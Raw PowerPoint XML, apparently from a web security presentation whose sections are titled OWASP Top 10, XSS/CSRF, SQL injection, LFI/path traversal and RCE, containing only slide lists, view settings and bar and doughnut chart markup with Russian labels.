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8" r:id="rId2"/>
    <p:sldId id="352" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="353" r:id="rId5"/>
    <p:sldId id="301" r:id="rId6"/>
    <p:sldId id="359" r:id="rId7"/>
    <p:sldId id="357" r:id="rId8"/>
    <p:sldId id="302" r:id="rId9"/>
    <p:sldId id="358" r:id="rId10"/>
    <p:sldId id="308" r:id="rId11"/>
    <p:sldId id="303" r:id="rId12"/>
    <p:sldId id="306" r:id="rId13"/>
    <p:sldId id="307" r:id="rId14"/>
    <p:sldId id="305" r:id="rId15"/>
    <p:sldId id="304" r:id="rId16"/>
    <p:sldId id="354" r:id="rId17"/>
    <p:sldId id="300" r:id="rId18"/>
    <p:sldId id="298" r:id="rId19"/>
    <p:sldId id="296" r:id="rId20"/>
    <p:sldId id="360" r:id="rId21"/>
    <p:sldId id="361" r:id="rId22"/>
    <p:sldId id="355" r:id="rId23"/>
    <p:sldId id="299" r:id="rId24"/>
    <p:sldId id="273" r:id="rId25"/>
    <p:sldId id="274" r:id="rId26"/>
    <p:sldId id="275" r:id="rId27"/>
    <p:sldId id="277" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="286" r:id="rId3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B2A236C-6641-4FA0-AD4A-68FB57C3049E}">
          <p14:sldIdLst>
            <p14:sldId id="288"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="OWASP TOP10" id="{2F268A32-E6B3-46BE-9D12-23EA37AC71CC}">
          <p14:sldIdLst>
            <p14:sldId id="352"/>
            <p14:sldId id="295"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Client-Side: XXS, CSRF" id="{C30D821D-FBA6-445A-8166-280C5FA741AB}">
          <p14:sldIdLst>
            <p14:sldId id="353"/>
            <p14:sldId id="301"/>
            <p14:sldId id="359"/>
            <p14:sldId id="357"/>
            <p14:sldId id="302"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="SQL-Injection" id="{8260DAB1-4A67-4455-9470-6801CDC556DF}">
          <p14:sldIdLst>
            <p14:sldId id="358"/>
            <p14:sldId id="308"/>
            <p14:sldId id="303"/>
            <p14:sldId id="306"/>
            <p14:sldId id="307"/>
            <p14:sldId id="305"/>
            <p14:sldId id="304"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="LFI, Path Traversal" id="{420C636B-A46E-495A-B27E-44F4DF1A7BD0}">
          <p14:sldIdLst>
            <p14:sldId id="354"/>
            <p14:sldId id="300"/>
            <p14:sldId id="298"/>
            <p14:sldId id="296"/>
            <p14:sldId id="360"/>
            <p14:sldId id="361"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="RCE" id="{B7E4DB37-5C79-4C28-8A71-000464B88943}">
          <p14:sldIdLst>
            <p14:sldId id="355"/>
            <p14:sldId id="299"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Раздел без заголовка" id="{D3DF3F22-131C-448A-841C-983F804E3EC4}">
          <p14:sldIdLst>
            <p14:sldId id="273"/>
            <p14:sldId id="274"/>
            <p14:sldId id="275"/>
            <p14:sldId id="277"/>
            <p14:sldId id="293"/>
            <p14:sldId id="286"/>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65A6"/>
    <a:srgbClr val="8EB6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Светлый стиль 2 — акцент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Светлый стиль 2 — акцент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Светлый стиль 2 — акцент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226" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="75" d="100"/>
          <a:sy n="75" d="100"/>
        </p:scale>
        <p:origin x="1056" y="322"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2183"/>
        <p:guide pos="3840"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="3978" y="-19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Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 1</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:ln w="76200" cap="rnd">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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$B$2:$B$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.11</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.28999999999999998</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000000-84B4-4310-8D56-0EFE58583E8E}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$C$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Ряд 2</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="8EB6F8"/>
            </a:solidFill>
            <a:ln w="76200" cap="rnd" cmpd="sng">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:invertIfNegative val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd" cmpd="sng">
                <a:noFill/>
                <a:round/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-84B4-4310-8D56-0EFE58583E8E}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:invertIfNegative val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="76200" cap="flat" cmpd="sng">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-84B4-4310-8D56-0EFE58583E8E}"/>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Q1 2020</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>Q2 2021</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Q3 2022</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Лист1!$C$2:$C$4</c:f>
              <c:numCache>
                <c:formatCode>0%</c:formatCode>
                <c:ptCount val="3"/>
                <c:pt idx="0">
                  <c:v>0.81</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.78</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.69</c:v>
                </c:pt>
              </c:numCache>
            </c:numRef>
          </c:val>
          <c:extLst>
            <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
              <c16:uniqueId val="{00000001-84B4-4310-8D56-0EFE58583E8E}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:dLblPos val="outEnd"/>
          <c:showLegendKey val="0"/>
          <c:showVal val="1"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="370"/>
        <c:overlap val="-100"/>
        <c:axId val="441752512"/>
        <c:axId val="441752840"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="441752512"/>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ru-RU"/>
          </a:p>
        </c:txPr>
        <c:crossAx val="441752840"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="441752840"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="b"/>
        <c:numFmt formatCode="0%" sourceLinked="1"/>
        <c:majorTickMark val="out"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="441752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911794727721994"/>
          <c:y val="9.2104904865294004E-2"/>
          <c:w val="0.36600676304040602"/>
          <c:h val="0.84761384425253383"/>
        </c:manualLayout>
      </c:layout>
      <c:doughnutChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>Лист1!$B$1</c:f>
              <c:strCache>
                <c:ptCount val="1"/>
                <c:pt idx="0">
                  <c:v>Продажи</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="76200" cap="rnd">
              <a:noFill/>
            </a:ln>
            <a:effectLst/>
          </c:spPr>
          <c:dPt>
            <c:idx val="0"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000D-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000B-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="2"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000A-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="3"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000009-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="4"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000008-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="5"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000007-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="6"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="8EB6F8"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000006-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="7"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000005-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="8"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000003-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="9"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{00000004-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="10"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000E-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dPt>
            <c:idx val="11"/>
            <c:bubble3D val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln w="76200" cap="rnd">
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </c:spPr>
            <c:extLst>
              <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                <c16:uniqueId val="{0000000C-BA82-4701-9528-F1C2935FDDAB}"/>
              </c:ext>
            </c:extLst>
          </c:dPt>
          <c:dLbls>
            <c:dLbl>
              <c:idx val="0"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.523888561559837E-2"/>
                  <c:y val="-6.6626645711874613E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.1725346601236169"/>
                      <c:h val="0.10283811523786612"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000D-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="1"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="2.5720167588796739E-2"/>
                  <c:y val="-4.441763889856936E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="9.9924801169697236E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000B-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="2"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="2.7400000711967121E-2"/>
                  <c:y val="-2.8554401643007557E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="3.2794931570790387E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000A-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="3"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="3.2373147809479044E-2"/>
                  <c:y val="-1.2690664750057704E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="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2.8684939554530782E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000009-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="4"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.1823204659915229E-2"/>
                  <c:y val="1.2490934692505382E-7"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="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7.5264849072139609E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000008-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="5"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="3.2992596203019774E-2"/>
                  <c:y val="4.7590586132114615E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="4.9234899635828805E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000007-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="6"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="1.3474773963658752E-2"/>
                  <c:y val="3.7477175939561749E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="b" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pP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0677478786346324"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000006-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="7"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-2.0549906144394916E-2"/>
                  <c:y val="7.6144862865775167E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:spPr>
                <a:xfrm>
                  <a:off x="5648343" y="3150904"/>
                  <a:ext cx="1599412" cy="411651"/>
                </a:xfrm>
                <a:noFill/>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </c:spPr>
              <c:txPr>
                <a:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="none" lIns="38100" tIns="19050" rIns="38100" bIns="19050" anchor="ctr" anchorCtr="0">
                  <a:noAutofit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:pP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9240"/>
                        <a:gd name="adj2" fmla="val 26925"/>
                      </a:avLst>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </c15:spPr>
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="0.10540479052471005"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000005-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="8"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-3.4137259461418663E-2"/>
                  <c:y val="4.1245191302412276E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="6.1908885252582715E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000003-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="9"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-3.5619876870680127E-2"/>
                  <c:y val="1.2490934704138472E-7"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="8.5792361693105265E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{00000004-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="10"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-2.8769890176914222E-2"/>
                  <c:y val="-4.1244941483718219E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
              <c:showSerName val="0"/>
              <c:showPercent val="0"/>
              <c:showBubbleSize val="0"/>
              <c:extLst>
                <c:ext xmlns:c15="http://schemas.microsoft.com/office/drawing/2012/chart" uri="{CE6537A1-D6FC-4f65-9D91-7224C49458BB}">
                  <c15:layout>
                    <c:manualLayout>
                      <c:w val="8.0312372338092464E-2"/>
                      <c:h val="0.10283811523786611"/>
                    </c:manualLayout>
                  </c15:layout>
                </c:ext>
                <c:ext xmlns:c16="http://schemas.microsoft.com/office/drawing/2014/chart" uri="{C3380CC4-5D6E-409C-BE32-E72D297353CC}">
                  <c16:uniqueId val="{0000000E-BA82-4701-9528-F1C2935FDDAB}"/>
                </c:ext>
              </c:extLst>
            </c:dLbl>
            <c:dLbl>
              <c:idx val="11"/>
              <c:layout>
                <c:manualLayout>
                  <c:x val="-1.2329922111875708E-2"/>
                  <c:y val="-6.6626520802527567E-2"/>
                </c:manualLayout>
              </c:layout>
              <c:showLegendKey val="0"/>
              <c:showVal val="1"/>
              <c:showCatName val="0"/>
